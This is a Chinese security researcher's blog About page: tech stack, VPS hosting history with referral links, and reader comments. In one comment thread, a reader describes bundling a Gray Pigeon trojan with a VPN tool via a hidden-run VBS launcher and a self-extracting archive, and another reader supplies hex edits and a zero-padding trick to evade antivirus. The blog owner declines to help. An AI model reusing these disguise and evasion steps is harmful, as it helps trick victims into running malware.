About.Me

前乌云网核心白帽子、混迹于各大社区的伪装程序猿,喜欢各种代码与审计、linux运维与内网、python web开发。

另外还是一个想当文人的黑客。

博客由Django驱动,架构:Docker + Python3 + Django + Postgres + Redis + Celery(异步任务),我为之取名为talkbook,具体介绍见 https://www.leavesongs.com/THINK/about-talkbook.html 。前端主题叫 cactus-dark ,是来自于Hexo的一款主题。

2012年到现在的博客主机变迁:

主机 配置 价格
wopus虚拟主机 600M硬盘/8G流量/US 90元/年
野草虚拟主机 600M硬盘/15G流量/HK 60元/年
Linode VPS(淘宝买的) XEN/1G内存/JP 70元/月
Conoha VPS KVM/1G内存/50G硬盘/JP 900日元/月
Vultr VPS KVM/512M内存/25G硬盘/JP 2.5美元/月
某VPS KVM/256M内存/10G硬盘/US 0.94美元/月

可见,我是越来越穷了,买的VPS越来越便宜;当然,这也能反映出,我在尽力压榨主机性能。因为一个博客并不需要太高的配置,而且因为我是Docker运行的,搬家比较方便,所以会尝试很多方案。

2021年10月,推荐几个这段时间性价比高的机器。(速买,随时可能过期,如果过期了,可以评论里提醒我)

国内机器,考虑腾讯云轻量服务器,2核4G内存8M带宽,74元人民币一年,香爆:https://curl.qcloud.com/w9fpwTPd

国外机器,vultr(日本),速度比较稳定,价格2.5刀一个月,配置:512M内存 + 20G SSD + 1CPU,性价比可以说爆表了。且Vultr是按小时付款,很灵活。

vultr的ping值:

sp160905_151022.png

点击购买: https://www.vultr.com/?ref=8960309-8H ,使用我的邀请码注册会有100美刀的礼券。

有事不要找我QQ和微信,直接联系邮箱即可,QQ不和陌生人联系。确实有时候问问题的人太多了,以前比较有耐心,现在工作了没空闲时间,所以问题在邮件里提出来,当然最好是发到星球里,我有空会回复。

黑产、工作室、0day收购、菠菜勿扰。

加入【代码审计】知识星球,跟我一起学审计~

dmsj.png

评论

zod 回复

好牛逼啊大神

maillot saxo bank 回复

来看看了呢~

留芳博客 回复

留芳来访!

he 回复

求推特用户名

百事可乐 回复

诚心找你合作项目,希望加我QQ1024236093详谈。

phithon 回复

@百事可乐:抱歉不做这个

Kieran 回复

pp脑残粉一枚 前来膜拜膜拜~~
看你博客乌云学到了好多xss技巧~~支持支持~~

m 回复

大神,你好,能给个XP黑客渗透测试平台的下载地址吗?

phithon 回复

@m:那个很老了,现在不知道还有没有。我是没有了。

p牛的脑残粉 回复

p牛
能推荐本 xss进阶的书嘛
一定要回复啊! ^-^

phithon 回复

@p牛的脑残粉:没有吧,书上不会有进阶的内容。多看看推特,那里有进阶。

mr_lonely 回复

第一题好坑,彩蛋。。。

Mamie 回复

哇咔咔~好巧好巧~昨天刚看见牛牛的wooyun帐号,今天就碰见牛牛的博客啦~~

灰常记忆 回复

好强大的板子~

student 回复

每天看看你博客 学习学习

听风的小孩 回复

>>> 1000000000000000L*99999999999999L
SyntaxError: invalid syntax
>>> 10000000000000L * 999999999999L
SyntaxError: invalid syntax
>>> 10000000000000L
SyntaxError: invalid syntax
>>> (10000000000000L)
SyntaxError: invalid syntax
>>>
输入长整型的时候为啥会报错,我用的是3.34版本,求帮忙解决一下,谢谢

phithon 回复

@听风的小孩:不清楚,我没用过3以上的版本

听风的小孩 回复

@phithon:借你一点时间,给点python学习的建议吧。谢了

luom 回复

帅哥 hackluom.net 现在换成 luom.net 了 麻烦改下

听风的小孩 回复

制作木马遇到的问题,希望你能帮看看,我在法客关注你好久了
过程是这样:
1. 非凡vpn加速器作为1.exe;
2. 灰鸽子制作的木马为2.exe;
3. 把这一段代码写入文本文档然后修改为1.vbs;代码如下
set ws = createobject("wscript.shell")
ws.run "cmd /c 1.exe",vbhide
ws.run "cmd /c 2.exe",vbhide
4. 然后把这三个添加到压缩文件生成桌面.exe
5. 最后把桌面.exe拉进c32asm这个工具里面,用16进制查找要修改的字符串


问题来了:请问怎样确定桌面.exe在这个工具里面要修改的字符串?

谢谢你抽空帮忙解决

phithon 回复

@听风的小孩:不清楚关于木马捆绑方面的知识。你在法客里提问吧。

贝壳iT 回复

@听风的小孩:最后你为什么要载入C32呢。是为了去掉解压自解压 桌面.exe菜单吗

第一种修改方式:
526172211A07 -> 526072211A07
807A0161 -> 807A0160
第二种修改方式:
526172211A07 -> 526171211A07
807A0272 -> 807A0171
修改后右键上根本没有了“用WINRAR打开的选项”


附RAR自解压免杀的简单办法:

在自解压文件的文件末尾加些“00 00 00”就可以了
加了很多00之后是能正常运行的

phithon 回复

@贝壳iT:感谢分享!

听风的小孩 回复

@贝壳iT:确实是为了不用winrar打开才选择用c32asm来修改字符串的,但是我还是不明白你上面写的,你怎样确定把
526172211A07 -> 526072211A07 17 改为07
807A0161 -> 807A0160 61改为60?我想弄明白怎样能找到自己要修改的字符串。 最后你说在末尾加00 00 00 怎样添加呢?用不用c32asm打开?
谢谢你对菜鸟的细心回答。

captcha